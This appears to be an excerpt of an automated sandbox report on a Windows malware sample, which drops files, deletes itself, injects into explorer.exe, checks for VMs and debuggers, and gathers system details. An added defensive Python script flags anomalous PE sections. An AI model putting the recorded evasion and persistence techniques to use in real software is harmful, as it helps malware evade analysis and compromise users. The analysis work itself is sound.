      Source: C:\Users\user\AppData\Roaming\jfrhswe	Unpacked PE file: 8.2.jfrhswe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xexolu:R;.naxurew:R;.havi:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Local\Temp\9245.exe	Code function: 10_2_00007FF7327A78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process, 10_2_00007FF7327A78EC
      Source: bCnarg2O62.exe	Static PE information: section name: .siy
      Source: bCnarg2O62.exe	Static PE information: section name: .fitecos
      Source: bCnarg2O62.exe	Static PE information: section name: .darulet
      Source: 1D0F.exe.1.dr	Static PE information: section name: .xexolu
      Source: 1D0F.exe.1.dr	Static PE information: section name: .naxurew
      Source: 1D0F.exe.1.dr	Static PE information: section name: .havi
      Source: jfrhswe.1.dr	Static PE information: section name: .xexolu
      Source: jfrhswe.1.dr	Static PE information: section name: .naxurew
      Source: jfrhswe.1.dr	Static PE information: section name: .havi
      Source: derhswe.1.dr	Static PE information: section name: .siy
      Source: derhswe.1.dr	Static PE information: section name: .fitecos
      Source: derhswe.1.dr	Static PE information: section name: .darulet
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	Code function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	Code function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	Code function: 0_2_00521540 pushad ; ret 0_2_00521550
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	Code function: 0_2_005C32ED push esp; ret 0_2_005C32EF
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	Code function: 0_2_005C1690 push B63524ADh; retn 001Fh 0_2_005C16C7
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	Code function: 0_2_005C218D pushfd ; iretd 0_2_005C218E
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 5_2_004014D9 pushad ; ret 5_2_004014E9
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 5_2_004031DB push eax; ret 5_2_004032AB
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 5_2_004A1540 pushad ; ret 5_2_004A1550
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 5_2_005225E5 push esp; ret 5_2_005225E7
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 5_2_00521485 pushfd ; iretd 5_2_00521486
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 5_2_00520988 push B63524ADh; retn 001Fh 5_2_005209BF
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 6_2_004014D9 pushad ; ret 6_2_004014E9
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 6_2_004031DB push eax; ret 6_2_004032AB
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 6_2_00521540 pushad ; ret 6_2_00521550
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 6_2_00754355 pushfd ; iretd 6_2_00754356
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 6_2_00753858 push B63524ADh; retn 001Fh 6_2_0075388F
      Source: C:\Users\user\AppData\Roaming\derhswe	Code function: 6_2_007554B5 push esp; ret 6_2_007554B7
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00402842 pushad ; retf F6A4h 7_2_004029D1
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00401065 pushfd ; retf 7_2_0040106A
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00402805 push 21CACAEFh; iretd 7_2_0040280A
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00402511 push ebp; iretd 7_2_00402523
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00403325 push eax; ret 7_2_004033F3
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00403433 pushad ; ret 7_2_004035AB
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00401182 push esp; retf 7_2_0040118E
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00402A9D pushad ; retf 7_2_00402AAB
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_004012B7 push cs; iretd 7_2_004012B8
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_005F2578 push ebp; iretd 7_2_005F258A
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_005F286C push 21CACAEFh; iretd 7_2_005F2871
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_005F131E push cs; iretd 7_2_005F131F
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_005F2B04 pushad ; retf 7_2_005F2B12
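      The "Unpacked PE file" and "section name" entries above rest on two static checks: whether a section is both writable and executable (the on-disk .text:ER versus the runtime .text:EW comparison) and whether the section table carries names no mainstream linker emits (.siy, .fitecos, .darulet, .xexolu, .naxurew, .havi). The Python below is an added example, not Joe Sandbox code and not part of this report: it parses a PE section table with the standard library only, renders permissions in the report's E/R/W notation and flags both conditions. The sample image, the runtime permission map and the COMMON_SECTIONS list are constructed for the example; the section layout mirrors the one reported for bCnarg2O62.exe, with rights taken as written in the report and sizes made up.

```python
"""Static PE section-table triage (standard library only): flag sections that
are writable and executable, section names no mainstream toolchain emits, and
permission changes between the on-disk header and what a memory dump shows."""
import struct
from dataclasses import dataclass

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
# Names emitted by common linkers; assumed list for this example.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".pdata",
                   ".bss", ".tls", ".CRT", ".textbss", ".didat", ".gfids", ".00cfg", ".ndata",
                   ".xdata", ".sdata", "INIT", "PAGE"}


@dataclass
class Section:
    name: str
    virtual_address: int
    raw_size: int
    characteristics: int

    def rights(self) -> str:
        """Permissions in the report's E/R/W notation."""
        return "".join(flag for flag, bit in (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ),
                                              ("W", IMAGE_SCN_MEM_WRITE)) if self.characteristics & bit)


def parse_sections(image: bytes) -> list:
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", image, coff + 2)[0]         # NumberOfSections
    size_of_optional = struct.unpack_from("<H", image, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(n_sections):
        # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
        f = struct.unpack_from("<8sIIIIIIHHI", image, table + 40 * i)
        sections.append(Section(f[0].rstrip(b"\0").decode("latin-1"), f[2], f[3], f[9]))
    return sections


def find_anomalies(sections) -> list:
    """Writable+executable sections and non-standard section names."""
    findings = []
    for s in sections:
        r = s.rights()
        if "E" in r and "W" in r:
            findings.append(f"{s.name}: writable and executable ({r})")
        if s.name not in COMMON_SECTIONS:
            findings.append(f"{s.name}: non-standard section name")
    return findings


def rights_changes(sections, observed_runtime: dict) -> dict:
    """Header rights vs. a {name: rights} map observed at runtime (e.g. from a
    dump). A .text that turned writable is the self-modifying-unpacker pattern."""
    header = {s.name: s.rights() for s in sections}
    return {n: (header[n], observed_runtime[n]) for n in header
            if n in observed_runtime and observed_runtime[n] != header[n]}


def build_test_image(section_specs) -> bytes:
    """Minimal PE32 skeleton with the given section table. Constructed test
    input: headers only, not a loadable executable."""
    e_lfanew, size_of_optional = 0x80, 0xE0
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, size_of_optional, 0x0102)
    optional = struct.pack("<H", 0x10B).ljust(size_of_optional, b"\0")
    table = b"".join(struct.pack("<8sIIIIIIHHI", name.encode(), vsize, vaddr, rsize, 0x400, 0, 0, 0, 0, chars)
                     for name, vsize, vaddr, rsize, chars in section_specs)
    return dos + b"PE\0\0" + coff + optional + table


# Layout as reported for bCnarg2O62.exe; rights as reported, sizes made up.
SAMPLE_SECTIONS = [
    (".text",    0x3000, 0x1000, 0x3000, 0x60000020),  # ER
    (".rdata",   0x1000, 0x4000, 0x1000, 0x40000040),  # R
    (".data",    0x1000, 0x5000, 0x1000, 0x80000040),  # W
    (".siy",     0x1000, 0x6000, 0x1000, 0x40000040),  # R, unusual name
    (".fitecos", 0x1000, 0x7000, 0x1000, 0x40000040),  # R, unusual name
    (".darulet", 0x1000, 0x8000, 0x1000, 0x80000080),  # W, unusual name
    (".rsrc",    0x1000, 0x9000, 0x1000, 0x40000040),  # R
]

if __name__ == "__main__":
    secs = parse_sections(build_test_image(SAMPLE_SECTIONS))
    print({s.name: s.rights() for s in secs})
    print(find_anomalies(secs))
    print(rights_changes(secs, {".text": "EW"}))  # runtime map constructed: .text seen as EW
```

      On a real sample, feed the on-disk file to parse_sections and build the runtime map from the memory dump's page protections; the names-only check is cheap enough to run across a whole directory of dropped files such as the extension-less derhswe and jfrhswe.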

      Persistence and Installation Behavior

      Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
      Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1D0F.exe
      Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\jfrhswe
      Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\derhswe
      Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9245.exe

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\explorer.exe	File deleted: c:\users\user\desktop\bcnarg2o62.exe
      Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\derhswe:Zone.Identifier read attributes | delete
      Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\jfrhswe:Zone.Identifier read attributes | delete
      Source: C:\Users\user\AppData\Local\Temp\9245.exe	Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\bCnarg2O62.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\AppData\Roaming\derhswe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\AppData\Roaming\jfrhswe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Windows\SysWOW64\explorer.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_14-890
      Source: C:\Users\user\AppData\Local\Temp\9245.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
      Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
      Source: C:\Users\user\AppData\Local\Temp\9245.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
      Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
      Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Source: C:\Users\user\AppData\Local\Temp\9245.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
      Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	API/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\bCnarg2O62.exe	API/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\derhswe	API/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\derhswe	API/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	API/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	API/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\jfrhswe	API/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\jfrhswe	API/Special instruction interceptor: Address: 7FFE2220D584
      Source: bCnarg2O62.exe, 00000000.00000002.1799228809.000000000059E000.00000004.00000020.00020000.00000000.sdmp, jfrhswe, 00000008.00000002.2520101512.000000000072E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
      Source: derhswe, 00000006.00000002.2106549863.0000000000738000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKKW
      Source: 1D0F.exe, 00000007.00000002.2263890739.000000000074E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKNL
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe	Code function: 7_2_00401E65 rdtsc 7_2_00401E65
      Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00581016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, 14_2_00581016
      Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 459
      Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 738
      Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 513
      Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 412
      Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 376
      Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 888
      Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 864
      Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 2630
      Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2197
      Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 3699
      Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3620
      Source: C:\Windows\explorer.exe TID: 5472	Thread sleep count: 459 > 30
      Source: C:\Windows\explorer.exe TID: 3852	Thread sleep count: 738 > 30
      Source: C:\Windows\explorer.exe TID: 3852	Thread sleep time: -73800s >= -30000s
      Source: C:\Windows\explorer.exe TID: 4900	Thread sleep count: 513 > 30
      Source: C:\Windows\explorer.exe TID: 4900	Thread sleep time: -51300s >= -30000s
      Source: C:\Windows\explorer.exe TID: 1460	Thread sleep count: 412 > 30
      Source: C:\Windows\explorer.exe TID: 3448	Thread sleep count: 246 > 30
      Source: C:\Windows\explorer.exe TID: 2000	Thread sleep count: 376 > 30
      Source: C:\Windows\explorer.exe TID: 2232	Thread sleep count: 192 > 30
      Source: C:\Windows\explorer.exe TID: 5740	Thread sleep count: 186 > 30
      Source: C:\Windows\explorer.exe TID: 1148	Thread sleep count: 225 > 30
      Source: C:\Windows\explorer.exe TID: 5004	Thread sleep count: 103 > 30
      Source: C:\Windows\explorer.exe TID: 2336	Thread sleep count: 139 > 30
      Source: C:\Windows\SysWOW64\explorer.exe TID: 5228	Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\explorer.exe TID: 2112	Thread sleep count: 2630 > 30
      Source: C:\Windows\SysWOW64\explorer.exe TID: 2112	Thread sleep time: -2630000s >= -30000s
      Source: C:\Windows\explorer.exe TID: 3904	Thread sleep count: 2197 > 30
      Source: C:\Windows\explorer.exe TID: 3904	Thread sleep time: -2197000s >= -30000s
      Source: C:\Windows\SysWOW64\explorer.exe TID: 5212	Thread sleep count: 3699 > 30
      Source: C:\Windows\SysWOW64\explorer.exe TID: 5212	Thread sleep time: -3699000s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2448	Thread sleep count: 3620 > 30
      Source: C:\Windows\explorer.exe TID: 2448	Thread sleep time: -3620000s >= -30000s
      Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Users\user\AppData\Local\Temp\9245.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
      Source: C:\Users\user\AppData\Local\Temp\9245.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
      Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
      Source: C:\Windows\explorer.exe	Last function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\9245.exe	Code function: 10_2_00007FF7327AFB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose, 10_2_00007FF7327AFB38
      Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_030F2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 12_2_030F2B15
      Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_030F3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 12_2_030F3ED9
      Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_030F1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 12_2_030F1D4A
      Source: C:\Windows\explorer.exe	Code function: 13_2_003C30A8 FindFirstFileW,FindNextFileW,FindClose, 13_2_003C30A8
      Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_030F6512 GetSystemInfo, 12_2_030F6512
      Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
      Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
      Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
      Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
      Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
      Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
      Source: explorer.exe, 00000001.00000000.1780445265.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: 9245.exe, 0000000A.00000002.4175619168.000002988741C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fo & echo 1403081037311360071403081037\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77104-AAOEM\r\nOriginal Install Date: 03/10/2023, 09:57:18\r\nSystem Boot Time: 24/09/2023, 13:00:03\r\nSystem Manufacturer: b41LKM44PbG2dx6\r\nSystem Model: ak DvpvW\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: ZF23E AWXUF, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'849 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'114 MB\r\nVirtual Memory: In Use: 1'077 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: SKpKn\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1403081037311360071403081037\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>
      Source: explorer.exe, 00000001.00000000.1779684746.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1779684746.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1780445265.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1777426774.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1780445265.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1777426774.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1779684746.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1779684746.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1779684746.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003446000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2734650053.0000000003429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1780445265.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1777426774.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: 9245.exe, 0000000A.00000002.4175619168.000002988741C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
      Source: explorer.exe, 00000001.00000000.1779684746.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: ROUTE.EXE, 00000023.00000002.3178249452.0000017983999000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: explorer.exe, 00000001.00000000.1775685561.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\bCnarg2O62.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      Source: C:\Users\user\Desktop\bCnarg2O62.exe | System information queried: CodeIntegrityInformation
      Source: C:\Users\user\AppData\Roaming\derhswe | System information queried: CodeIntegrityInformation
      Source: C:\Users\user\AppData\Roaming\derhswe | System information queried: CodeIntegrityInformation
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | System information queried: CodeIntegrityInformation
      Source: C:\Users\user\AppData\Roaming\jfrhswe | System information queried: CodeIntegrityInformation
      Source: C:\Users\user\Desktop\bCnarg2O62.exe | Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\derhswe | Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\derhswe | Process queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\jfrhswe | Process queried: DebugPort
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Code function: 7_2_00401E65 rdtsc
      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00581B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock
